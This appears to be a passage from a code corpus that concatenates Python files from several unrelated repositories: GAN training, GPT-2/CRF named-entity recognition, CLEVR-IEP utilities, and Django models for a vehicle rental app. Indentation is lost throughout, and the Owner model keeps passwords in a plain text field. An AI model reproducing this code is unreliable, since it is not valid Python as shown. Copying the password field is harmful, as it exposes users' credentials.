Corresponds to optimizeParameters from pytorch_GAN_zoo/models/base_GAN.py
"""
img_real = self.load_next_batch()
n_samples = len(img_real)
###########
# Train D #
###########
if self.scale_index:
low_img_real = F.avg_pool2d(img_real, (2, 2))
low_img_real = F.upsample(low_img_real, scale_factor=2, mode='nearest')
img_real = (1-self.D.alpha) * low_img_real + self.D.alpha * img_real
img_real.requires_grad_()
pred_real = self.D(img_real)
latent_input = torch.randn(n_samples, self.args.latent_dim).to(self.gpu)
img_fake = self.G(latent_input).detach()
pred_fake = self.D(img_fake)
D_dict = {
"img_real": img_real,
"img_fake": img_fake,
"pred_real": pred_real,
"pred_fake": pred_fake,
}
loss_D = self.loss_collector.get_loss_D(D_dict)
utils.update_net(self.opt_D, loss_D)
###########
# Train G #
###########
latent_input = torch.randn(n_samples, self.args.latent_dim).to(self.gpu)
img_fake = self.G(latent_input)
pred_fake, _ = self.D(img_fake, True)
G_dict = {
"pred_fake": pred_fake,
}
loss_G = self.loss_collector.get_loss_G(G_dict)
utils.update_net(self.opt_G, loss_G)
return [img_real, img_fake]
def save_image(self, images, step):
utils.save_image(self.args, step, "imgs", images)
def validation(self):
pass
@property
def loss_collector(self):
return self._loss_collector
``` |
{
"source": "20000607-lxc/BERT-NER-Pytorch-master",
"score": 2
} |
#### File: BERT-NER-Pytorch-master/models/gpt_crf_for_ner.py
```python
import torch
import torch.nn as nn
from .layers.crf import CRF
from .transformers_master.models.gpt2.modeling_gpt2 import GPT2Model as New_GPT2
from models.p_tuning.prompt_encoder import PromptEncoder
from torch.nn.utils.rnn import pad_sequence
from transformers import GPT2LMHeadModel
from .layers.model.lstmcrf import NNCRF
class GPT2CrfForNer(torch.nn.Module):
"""
输出input[1:] + prompt3 对应的hidden state
tokenizer: bert-base-chinese or gpt2 tokenizer
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.num_labels = config.num_labels
self.device = device
if model_name == None:
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
self.gpt2 = self.LMgpt2.base_model# New_GPT2.from_pretrained(model_name).to(self.device)# 可以接受inputs_embeds和input_ids
self.embeddings = self.gpt2.get_input_embeddings().to(device)#embedding是GPT2LMHeadModel的embedding
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.loss_type = 'ce'
self.crf = CRF(num_tags=config.num_labels, batch_first=True).to(self.device)
self.lstmcrf = NNCRF(config=config, device=device, num_tags=config.num_labels, batch_first=True).to(self.device)
self.pseudo_token_id = 50257# <PASSWORD> word的id
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.lstm = torch.nn.LSTM(input_size=self.hidden_size,
hidden_size=self.hidden_size // 2,
num_layers=2,
dropout=0.0,
bidirectional=True,
batch_first=True).to(self.device)
print("init GPT2CrfForNer ")
def get_query(self, input_id, prompt_tokens, Bi_lstm=False, lstm=False):
# reversed = False
# if reversed:
# reversed_sequence = [input_id[len(input_id)-1-i] for i in range(len(input_id))]
# return [prompt_tokens * self.template[0] +
# reversed_sequence +
# prompt_tokens * self.template[1] +
# [input_id[i] for i in range(len(input_id))]
# ]
# elif Bi_lstm:
# return [ prompt_tokens * self.template[0]
# + prompt_tokens * len(input_id)
# + prompt_tokens * self.template[1]
# + [input_id[i] for i in range(len(input_id))]
# ]
# elif lstm:
# return [ prompt_tokens * self.template[0]
# + [input_id[i] for i in range(len(input_id))]
# + prompt_tokens * self.template[1]
# + [input_id[i] for i in range(len(input_id))]
# ]
# else:
input = []
prompt1 = []
prompt2 = []
prompt3 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
prompt3.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
if self.template[0] == self.template[1]:
query = prompt1 + input + prompt2 + input# + prompt3# prompt3 一位
else:
query = prompt1 + input + prompt2 # + prompt3
return query, count
def embed_input(self, queries, input_embeds, Bi_lstm=False, lstm=False, counts=None):
"""
turn the queries(word index) :[batch_size,query_length]
into embeddings: [batch_size,query_length,768]
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
# if Bi_lstm:
# sequence_length = input_embeds.shape[1]
# raw_embeds = torch.zeros(queries.shape[0],queries.shape[1], 768)
# prompt_length =raw_embeds.shape[1]-sequence_length
# for j in range(bz):
# replace_embeds = self.prompt_encoder(raw_embeds[j, prompt_length:, :])
# raw_embeds[j] = self.embeddings(queries_for_embedding[j])
# block_length = prompt_length
# for i in range(block_length):
# raw_embeds[j, i:i+1, :] = replace_embeds[i, :]
# return raw_embeds
#
# elif lstm:
# replace_embeds = self.prompt_encoder()
# raw_embeds = self.embeddings(queries_for_embedding)
# input = copy.deepcopy(raw_embeds)
# l = len(queries[0])-(len(queries[0])-12)//2
# block_length1 = self.template[0]
# block_length2 = self.template[1]
# for bidx in range(bz):
# for i in range(block_length1):
# raw_embeds[bidx, i:i+1, :] = replace_embeds[i, :]
# for j in range(block_length2):
# raw_embeds[bidx, l-block_length2+j:l-block_length2+j+1, :] = replace_embeds[block_length1+j, :]
# output, _ = self.lstm(input[bidx, block_length1:l-block_length1, :].unsqueeze(0))#lstm的输入dimension = 3
# raw_embeds[bidx, block_length1:l-block_length1, :] = output.squeeze(0)
# # 记得要采用deepcopy 否则会有以下错误(在loss.backward()时)
# # RuntimeError: one of the variables needed for gradient computation has been modified
# # by an inplace operation: [torch.cuda.FloatTensor [1, 27, 768]], which is output 0 of
# # UnsqueezeBackward0, is at version 104; expected version 103 instead. Hint: enable
# # anomaly detection to find the operation that failed to compute its gradient, with
# # torch.autograd.set_detect_anomaly(True).
#
# return raw_embeds
#
# else:
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
# 加入最后一位
raw_embeds[bidx, i+1+counts[bidx]+self.template[0], :] = replace_embeds[i+1+self.template[0], :]
return raw_embeds
def forward(self, input_ids, attention_mask=None, labels=None, token_type_ids=None, input_lens=None):
"""
Args:
input_ids: padded seuqence:[batch_size, max_length]
if Chinese: input_ids = [101,...,102, 0,...,0]
attention_mask: [batch_size, max_length]
token_type_ids: [batch_size, max_length]
position_ids: [batch_size, max_length]
head_mask: [batch_size, max_length]
labels: [batch_size, max_length]
Returns:
outputs
"""
bz = len(input_ids)
bx = len(input_ids[0])
prompt_tokens = [self.pseudo_token_id]
Bi_lstm = False
lstm = False
counts = []
queries = []
for i in range(bz):
query, count = self.get_query(input_ids[i], prompt_tokens, Bi_lstm, lstm)
counts.append(count)
queries.append(torch.LongTensor(query).squeeze(0))
queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
attention_mask1 = queries != self.pad_token_id
inputs_embeds = self.embed_input(queries, input_ids, Bi_lstm, lstm, counts)
inputs = inputs_embeds.to(self.device)
outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
# decode the output ids to see if there is some patterns
outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
example = torch.argsort(outputs2[0], dim=2, descending=True)[0, sum(self.template)+counts[0]+1:, 0]
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
sequence = torch.zeros(bz, bx, self.hidden_size).to(self.device)
for bdix in range(bz):
if self.template[0] == self.template[1]:
place = sum(self.template)+counts[bdix]
else:
place = self.template[0] + counts[bdix]
sequence[bdix, :counts[bdix], :] = sequence_output[bdix, place:place+counts[bdix], :]
# todo 只截取没有pad的id对应的input
logits = self.classifier(sequence)
outputs = (example,)+outputs[2:]
outputs = (logits,) + outputs # add hidden states and attention if they are here
if labels is not None:
loss = self.crf(emissions=logits, tags=labels, mask=attention_mask)#crf的作用即为计算loss
# loss = self.lstmcrf(word_embeds=sequence_output, word_seq_length=word_seq_length,
# #emissions=logits,
# tags=labels, mask=attention_mask)
# def forward(self, emissions: torch.Tensor, tags: torch.LongTensor,
# mask:Optional[torch.ByteTensor] = None, reduction: str = 'mean') #mask是optional的,
# -> torch.Tensor:loss
# mask的作用:在CRF中做了分母
outputs = (-1*loss,)+outputs
return outputs # (loss), scores
```
#### File: layers/common/sentence.py
```python
from typing import List
class Sentence:
def __init__(self, words: List[str], heads: List[int]=None , dep_labels: List[str]=None, pos_tags:List[str] = None):
self.words = words
self.heads = heads
self.dep_labels = dep_labels
self.pos_tags = pos_tags
def __len__(self):
return len(self.words)
# if __name__ == "__main__":
#
# words = ["a" ,"sdfsdf"]
# sent = Sentence(words)
#
# print(len(sent))
```
#### File: layers/config/eval.py
```python
import numpy as np
from typing import Tuple
from collections import defaultdict
class Span:
def __init__(self, left, right, type):
self.left = left
self.right = right
self.type = type
def __eq__(self, other):
return self.left == other.left and self.right == other.right and self.type == other.type
def __hash__(self):
return hash((self.left, self.right, self.type))
def to_str(self, sent):
return str(sent[self.left: (self.right+1)]) + ","+self.type
## the input to the evaluation should already have
## have the predictions which is the label.
## iobest tagging scheme
### NOTE: this function is used to evaluate the instances with prediction ready.
def evaluate(insts):
p = 0
total_entity = 0
total_predict = 0
batch_p_dict = defaultdict(int)
batch_total_entity_dict = defaultdict(int)
batch_total_predict_dict = defaultdict(int)
for inst in insts:
output = inst.output
prediction = inst.prediction
#convert to span
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
batch_total_entity_dict[output[i][2:]] += 1
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
batch_total_entity_dict[output[i][2:]] += 1
start = -1
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
batch_total_predict_dict[prediction[i][2:]] += 1
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
batch_total_predict_dict[prediction[i][2:]] += 1
total_entity += len(output_spans)
total_predict += len(predict_spans)
correct_spans = predict_spans.intersection(output_spans)
p += len(correct_spans)
for span in correct_spans:
batch_p_dict[span.type] += 1
for key in batch_total_entity_dict:
precision_key, recall_key, fscore_key = get_metric(batch_p_dict[key], batch_total_entity_dict[key], batch_total_predict_dict[key])
print("[%s] Prec.: %.2f, Rec.: %.2f, F1: %.2f" % (key, precision_key, recall_key, fscore_key))
precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return [precision, recall, fscore]
def get_metric(p_num: int, total_num: int, total_predicted_num: int) -> Tuple[float, float, float]:
"""
Return the metrics of precision, recall and f-score, based on the number
(We make this small piece of function in order to reduce the code effort and less possible to have typo error)
:param p_num:
:param total_num:
:param total_predicted_num:
:return:
"""
precision = p_num * 1.0 / total_predicted_num * 100 if total_predicted_num != 0 else 0
recall = p_num * 1.0 / total_num * 100 if total_num != 0 else 0
fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return precision, recall, fscore
def evaluate_num(batch_insts, batch_pred_ids, batch_gold_ids, word_seq_lens, idx2label):
"""
evaluate the batch of instances
:param batch_insts:
:param batch_pred_ids:
:param batch_gold_ids:
:param word_seq_lens:
:param idx2label:
:return:
"""
p = 0
total_entity = 0
total_predict = 0
word_seq_lens = word_seq_lens.tolist()
for idx in range(len(batch_pred_ids)):
length = word_seq_lens[idx]
output = batch_gold_ids[idx][:length].tolist()
prediction = batch_pred_ids[idx][:length].tolist()
prediction = prediction[::-1]
output = [idx2label[l] for l in output]
prediction =[idx2label[l] for l in prediction]
batch_insts[idx].prediction = prediction
#convert to span
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
total_entity += len(output_spans)
total_predict += len(predict_spans)
p += len(predict_spans.intersection(output_spans))
# precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
# recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
# fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return np.asarray([p, total_predict, total_entity], dtype=int)
```
#### File: layers/config/utils.py
```python
import numpy as np
import torch
from typing import List
from ..common.instance import Instance
from .eval import Span
START = "<START>"
STOP = "<STOP>"
PAD = "<PAD>"
ROOT = "<ROOT>"
ROOT_DEP_LABEL = "root"
SELF_DEP_LABEL = "self"
def log_sum_exp_pytorch(vec):
"""
:param vec: [batchSize * from_label * to_label]
:return: [batchSize * to_label]
"""
maxScores, idx = torch.max(vec, 1)
maxScores[maxScores == -float("Inf")] = 0
maxScoresExpanded = maxScores.view(vec.shape[0] ,1 , vec.shape[2]).expand(vec.shape[0], vec.shape[1], vec.shape[2])
return maxScores + torch.log(torch.sum(torch.exp(vec - maxScoresExpanded), 1))
def simple_batching(config, insts: List[Instance]):
from config.config import DepModelType,ContextEmb
"""
:param config:
:param insts:
:return:
word_seq_tensor,
word_seq_len,
char_seq_tensor,
char_seq_len,
label_seq_tensor
"""
batch_size = len(insts)
batch_data = sorted(insts, key=lambda inst: len(inst.input.words), reverse=True) ##object-based not direct copy
word_seq_len = torch.LongTensor(list(map(lambda inst: len(inst.input.words), batch_data)))
max_seq_len = word_seq_len.max()
### NOTE: the 1 here might be used later?? We will make this as padding, because later we have to do a deduction.
#### Use 1 here because the CharBiLSTM accepts
char_seq_len = torch.LongTensor([list(map(len, inst.input.words)) + [1] * (int(max_seq_len) - len(inst.input.words)) for inst in batch_data])
max_char_seq_len = char_seq_len.max()
word_emb_tensor = None
if config.context_emb != ContextEmb.none:
emb_size = insts[0].elmo_vec.shape[1]
word_emb_tensor = torch.zeros((batch_size, max_seq_len, emb_size))
word_seq_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
label_seq_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
char_seq_tensor = torch.zeros((batch_size, max_seq_len, max_char_seq_len), dtype=torch.long)
adjs = None
adjs_in = None
adjs_out = None
dep_label_adj = None
dep_label_tensor = None
batch_dep_heads = None
trees = None
graphs = None
if config.dep_model != DepModelType.none:
if config.dep_model == DepModelType.dggcn:
adjs = [ head_to_adj(max_seq_len, inst, config) for inst in batch_data]
adjs = np.stack(adjs, axis=0)
adjs = torch.from_numpy(adjs)
dep_label_adj = [head_to_adj_label(max_seq_len, inst, config) for inst in batch_data]
dep_label_adj = torch.from_numpy(np.stack(dep_label_adj, axis=0)).long()
if config.dep_model == DepModelType.dglstm:
batch_dep_heads = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
dep_label_tensor = torch.zeros((batch_size, max_seq_len), dtype=torch.long)
# trees = [inst.tree for inst in batch_data]
for idx in range(batch_size):
word_seq_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].word_ids)
label_seq_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].output_ids)
if config.context_emb != ContextEmb.none:
word_emb_tensor[idx, :word_seq_len[idx], :] = torch.from_numpy(batch_data[idx].elmo_vec)
if config.dep_model == DepModelType.dglstm:
batch_dep_heads[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].dep_head_ids)
dep_label_tensor[idx, :word_seq_len[idx]] = torch.LongTensor(batch_data[idx].dep_label_ids)
for word_idx in range(word_seq_len[idx]):
char_seq_tensor[idx, word_idx, :char_seq_len[idx, word_idx]] = torch.LongTensor(batch_data[idx].char_ids[word_idx])
for wordIdx in range(word_seq_len[idx], max_seq_len):
char_seq_tensor[idx, wordIdx, 0: 1] = torch.LongTensor([config.char2idx[PAD]]) ###because line 119 makes it 1, every single character should have a id. but actually 0 is enough
### NOTE: make this step during forward if you have limited GPU resource.
word_seq_tensor = word_seq_tensor.to(config.device)
label_seq_tensor = label_seq_tensor.to(config.device)
char_seq_tensor = char_seq_tensor.to(config.device)
word_seq_len = word_seq_len.to(config.device)
char_seq_len = char_seq_len.to(config.device)
if config.dep_model != DepModelType.none:
if config.dep_model == DepModelType.dglstm:
batch_dep_heads = batch_dep_heads.to(config.device)
dep_label_tensor = dep_label_tensor.to(config.device)
return word_seq_tensor, word_seq_len, word_emb_tensor, char_seq_tensor, char_seq_len, adjs, adjs_in, adjs_out, graphs, dep_label_adj, batch_dep_heads, trees, label_seq_tensor, dep_label_tensor
def lr_decay(config, optimizer, epoch):
lr = config.learning_rate / (1 + config.lr_decay * (epoch - 1))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
print('learning rate is set to: ', lr)
return optimizer
def head_to_adj(max_len, inst, config):
"""
Convert a tree object to an (numpy) adjacency matrix.
"""
directed = config.adj_directed
self_loop = False #config.adj_self_loop
ret = np.zeros((max_len, max_len), dtype=np.float32)
for i, head in enumerate(inst.input.heads):
if head == -1:
continue
ret[head, i] = 1
if not directed:
ret = ret + ret.T
if self_loop:
for i in range(len(inst.input.words)):
ret[i, i] = 1
return ret
def head_to_adj_label(max_len, inst, config):
"""
Convert a tree object to an (numpy) adjacency matrix.
"""
directed = config.adj_directed
self_loop = config.adj_self_loop
dep_label_ret = np.zeros((max_len, max_len), dtype=np.long)
for i, head in enumerate(inst.input.heads):
if head == -1:
continue
dep_label_ret[head, i] = inst.dep_label_ids[i]
if not directed:
dep_label_ret = dep_label_ret + dep_label_ret.T
if self_loop:
for i in range(len(inst.input.words)):
dep_label_ret[i, i] = config.root_dep_label_id
return dep_label_ret
def get_spans(output):
output_spans = set()
start = -1
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
return output_spans
def preprocess(conf, insts, file_type:str):
print("[Preprocess Info]Doing preprocessing for the CoNLL-2003 dataset: {}.".format(file_type))
for inst in insts:
output = inst.output
spans = get_spans(output)
for span in spans:
if span.right - span.left + 1 < 2:
continue
count_dep = 0
for i in range(span.left, span.right + 1):
if inst.input.heads[i] >= span.left and inst.input.heads[i] <= span.right:
count_dep += 1
if count_dep != (span.right - span.left):
for i in range(span.left, span.right + 1):
if inst.input.heads[i] < span.left or inst.input.heads[i] > span.right:
if i != span.right:
inst.input.heads[i] = span.right
inst.input.dep_labels[i] = "nn" if "sd" in conf.affix else "compound"
```
#### File: models/p_tuning/prompt_encoder.py
```python
import torch
import torch.nn as nn
class PromptEncoder(torch.nn.Module):
def __init__(self, template, hidden_size, device):
super().__init__()
self.device = device
self.spell_length = sum(template)
self.hidden_size = hidden_size
# ent embedding
self.cloze_length = (template[0], template[1], 0)
self.cloze_mask = [
[1] * self.cloze_length[0] # first cloze
+ [1] * self.cloze_length[1] # second cloze
+ [1] * self.cloze_length[2] # third cloze
]
self.cloze_mask = torch.LongTensor(self.cloze_mask).bool().to(self.device)
self.seq_indices = torch.LongTensor(list(range(len(self.cloze_mask[0])))).to(self.device)
# embedding
self.embedding = torch.nn.Embedding(len(self.cloze_mask[0]), self.hidden_size).to(self.device)
# LSTM
self.lstm_head = torch.nn.LSTM(input_size=self.hidden_size,
hidden_size=self.hidden_size // 2,
num_layers=2,
dropout=0.0,# self.args.lstm_dropout = 0.0
bidirectional=True,
batch_first=True)
self.mlp_head = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size),
nn.ReLU(),
nn.Linear(self.hidden_size, self.hidden_size))
print("init prompt encoder...")
def forward(self, input_sequence=None):
if input_sequence == None:
input_embeds = self.embedding(self.seq_indices).unsqueeze(0)
output_embeds = self.mlp_head(self.lstm_head(input_embeds)[0]).squeeze()
else:
input_embeds = self.embedding(self.seq_indices).unsqueeze(0)
input_sequence = input_sequence.unsqueeze(0)
input_sequence = input_sequence.to(self.device)
#output_embeds = self.mlp_head(self.lstm_head(input_embeds)[0]).squeeze()
input_embeds_cat = torch.cat((input_embeds[:, 0:self.cloze_length[0]-1, :],
input_sequence, input_embeds[:, self.cloze_length[0]:self.cloze_length[0]*2-1, :]), dim=1)
output_embeds = self.mlp_head(self.lstm_head(input_embeds_cat)[0]).squeeze()
return output_embeds
``` |
{
"source": "2000090063/Vehicle_Rental_System-SDP-2-",
"score": 2
} |
#### File: Vehicle_Rental_System-SDP-2-/Owner/models.py
```python
from django.db import models
# Create your models here.
class Owner(models.Model):
Owner_id = models.AutoField
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license)
```
#### File: Vehicle_Rental_System-SDP-2-/RentVehicle/models.py
```python
from django.db import models
from Vehicles.models import Vehicle
from CustomerHome.models import Customer
from Owner.models import Owner
from Manager.models import Manager
# Create your models here.
class RentVehicle(models.Model):
RentVehicle_id = models.AutoField
RentVehicle_Date_of_Booking = models.DateField(blank=True,null=True)
RentVehicle_Date_of_Return = models.DateField(blank=True,null=True)
Total_days = models.IntegerField()
Advance_amount = models.IntegerField(blank=True,null=True)
RentVehicle_Total_amount = models.IntegerField(blank=True,null=True)
isAvailable = models.BooleanField(default=True)
isBillPaid = models.BooleanField(default=False)
Vehicle_license_plate = models.CharField(max_length=30)
customer_email = models.CharField(max_length=100)
request_responded_by = models.CharField(max_length=100,blank=True,null=True)
request_status = models.CharField(max_length=30,default="Pending")
def __str__(self):
return self.customer_email + ": " + str(self.Vehicle_license_plate)
``` |
{
"source": "20001LastOrder/Neural_Networks_Reliability_Analysis",
"score": 2
} |
#### File: PyTorch_CIFAR10/models_evaluation/evaluations.py
```python
import torch
import pytorch_lightning as pl
from pytorch_lightning.metrics import Accuracy
class CombinedNetwork(pl.LightningModule):
def __init__(self, model1, model2, hparams):
super().__init__()
self.hparams = hparams
self.model1 = model1
self.model2 = model2
self.accuracy = Accuracy()
def forward(self, batch):
pred1 = torch.argmax(self.model1(batch), dim=1)
pred2 = torch.argmax(self.model2(batch), dim=1)
return pred1, pred2
def training_step(self, batch, batch_nb):
raise RuntimeError
def validation_step(self, batch, batch_nb):
raise RuntimeError
def test_step(self, batch, batch_nb):
images, labels = batch
n = labels.size(0)
pred1, pred2 = self.forward(images)
t1 = (pred1 == labels).sum().item() / n
t2 = (pred2 == labels).sum().item() / n
tt = ((pred1 == labels) * (pred1 == pred2)).sum().item() / n
tf = ((pred1 == labels) * (pred1 != pred2)).sum().item() / n
self.log('acc/t1', t1)
self.log('acc/t2', t2)
self.log('acc/tt', tt)
self.log('acc/tf', tf)
```
#### File: clevr-iep/iep/preprocess.py
```python
SPECIAL_TOKENS = {
'<NULL>': 0,
'<START>': 1,
'<END>': 2,
'<UNK>': 3,
}
def tokenize(s, delim=' ',
add_start_token=True, add_end_token=True,
punct_to_keep=None, punct_to_remove=None):
"""
Tokenize a sequence, converting a string s into a list of (string) tokens by
splitting on the specified delimiter. Optionally keep or remove certain
punctuation marks and add start and end tokens.
"""
if punct_to_keep is not None:
for p in punct_to_keep:
s = s.replace(p, '%s%s' % (delim, p))
if punct_to_remove is not None:
for p in punct_to_remove:
s = s.replace(p, '')
tokens = s.split(delim)
if add_start_token:
tokens.insert(0, '<START>')
if add_end_token:
tokens.append('<END>')
return tokens
def build_vocab(sequences, min_token_count=1, delim=' ',
punct_to_keep=None, punct_to_remove=None):
token_to_count = {}
tokenize_kwargs = {
'delim': delim,
'punct_to_keep': punct_to_keep,
'punct_to_remove': punct_to_remove,
}
for seq in sequences:
seq_tokens = tokenize(seq, **tokenize_kwargs,
add_start_token=False, add_end_token=False)
for token in seq_tokens:
if token not in token_to_count:
token_to_count[token] = 0
token_to_count[token] += 1
token_to_idx = {}
for token, idx in SPECIAL_TOKENS.items():
token_to_idx[token] = idx
for token, count in sorted(token_to_count.items()):
if count >= min_token_count:
token_to_idx[token] = len(token_to_idx)
return token_to_idx
def encode(seq_tokens, token_to_idx, allow_unk=False):
seq_idx = []
for token in seq_tokens:
if token not in token_to_idx:
if allow_unk:
token = '<UNK>'
else:
raise KeyError('Token "%s" not in vocab' % token)
seq_idx.append(token_to_idx[token])
return seq_idx
def decode(seq_idx, idx_to_token, delim=None, stop_at_end=True):
tokens = []
for idx in seq_idx:
tokens.append(idx_to_token[idx])
if stop_at_end and tokens[-1] == '<END>':
break
if delim is None:
return tokens
else:
return delim.join(tokens)
```
#### File: clevr-iep/iep/utils.py
```python
import json
import torch
from iep.models import ModuleNet, Seq2Seq, LstmModel, CnnLstmModel, CnnLstmSaModel
def invert_dict(d):
return {v: k for k, v in d.items()}
def load_vocab(path):
with open(path, 'r') as f:
vocab = json.load(f)
vocab['question_idx_to_token'] = invert_dict(vocab['question_token_to_idx'])
vocab['program_idx_to_token'] = invert_dict(vocab['program_token_to_idx'])
vocab['answer_idx_to_token'] = invert_dict(vocab['answer_token_to_idx'])
# Sanity check: make sure <NULL>, <START>, and <END> are consistent
assert vocab['question_token_to_idx']['<NULL>'] == 0
assert vocab['question_token_to_idx']['<START>'] == 1
assert vocab['question_token_to_idx']['<END>'] == 2
assert vocab['program_token_to_idx']['<NULL>'] == 0
assert vocab['program_token_to_idx']['<START>'] == 1
assert vocab['program_token_to_idx']['<END>'] == 2
return vocab
def load_cpu(path):
"""
Loads a torch checkpoint, remapping all Tensors to CPU
"""
return torch.load(path, map_location=lambda storage, loc: storage)
def load_program_generator(path):
checkpoint = load_cpu(path)
kwargs = checkpoint['program_generator_kwargs']
state = checkpoint['program_generator_state']
model = Seq2Seq(**kwargs)
model.load_state_dict(state)
return model, kwargs
def load_execution_engine(path, verbose=True):
checkpoint = load_cpu(path)
kwargs = checkpoint['execution_engine_kwargs']
state = checkpoint['execution_engine_state']
kwargs['verbose'] = verbose
model = ModuleNet(**kwargs)
cur_state = model.state_dict()
model.load_state_dict(state)
return model, kwargs
def load_baseline(path):
model_cls_dict = {
'LSTM': LstmModel,
'CNN+LSTM': CnnLstmModel,
'CNN+LSTM+SA': CnnLstmSaModel,
}
checkpoint = load_cpu(path)
baseline_type = checkpoint['baseline_type']
kwargs = checkpoint['baseline_kwargs']
state = checkpoint['baseline_state']
model = model_cls_dict[baseline_type](**kwargs)
model.load_state_dict(state)
return model, kwargs
```
#### File: clevr-iep/scripts/run_model.py
```python
import argparse
import json
import random
import shutil
import sys
import os
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision
import numpy as np
import h5py
# from scipy.misc import imread, imresize
import cv2
sys.path.append('.')
import iep.utils as utils
import iep.programs
from iep.data import ClevrDataset, ClevrDataLoader
from iep.preprocess import tokenize, encode
parser = argparse.ArgumentParser()
parser.add_argument('--program_generator', default=None)
parser.add_argument('--execution_engine', default=None)
parser.add_argument('--baseline_model', default=None)
parser.add_argument('--use_gpu', default=1, type=int)
# For running on a preprocessed dataset
parser.add_argument('--input_question_h5', default='data/val_questions.h5')
parser.add_argument('--input_features_h5', default='data-ssd/val_features.h5')
parser.add_argument('--use_gt_programs', default=0, type=int)
# This will override the vocab stored in the checkpoint;
# we need this to run CLEVR models on human data
parser.add_argument('--vocab_json', default=None)
# For running on a single example
parser.add_argument('--question', default=None)
parser.add_argument('--image', default=None)
parser.add_argument('--cnn_model', default='resnet101')
parser.add_argument('--cnn_model_stage', default=3, type=int)
parser.add_argument('--image_width', default=224, type=int)
parser.add_argument('--image_height', default=224, type=int)
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--num_samples', default=None, type=int)
parser.add_argument('--family_split_file', default=None)
parser.add_argument('--sample_argmax', type=int, default=1)
parser.add_argument('--temperature', default=1.0, type=float)
# If this is passed, then save all predictions to this file
parser.add_argument('--output_h5', default=None)
def main(args):
print()
model = None
if args.baseline_model is not None:
print('Loading baseline model from ', args.baseline_model)
model, _ = utils.load_baseline(args.baseline_model)
if args.vocab_json is not None:
new_vocab = utils.load_vocab(args.vocab_json)
model.rnn.expand_vocab(new_vocab['question_token_to_idx'])
elif args.program_generator is not None and args.execution_engine is not None:
print('Loading program generator from ', args.program_generator)
program_generator, _ = utils.load_program_generator(args.program_generator)
print('Loading execution engine from ', args.execution_engine)
execution_engine, _ = utils.load_execution_engine(args.execution_engine, verbose=False)
if args.vocab_json is not None:
new_vocab = utils.load_vocab(args.vocab_json)
program_generator.expand_encoder_vocab(new_vocab['question_token_to_idx'])
model = (program_generator, execution_engine)
else:
print('Must give either --baseline_model or --program_generator and --execution_engine')
return
if args.question is not None and args.image is not None:
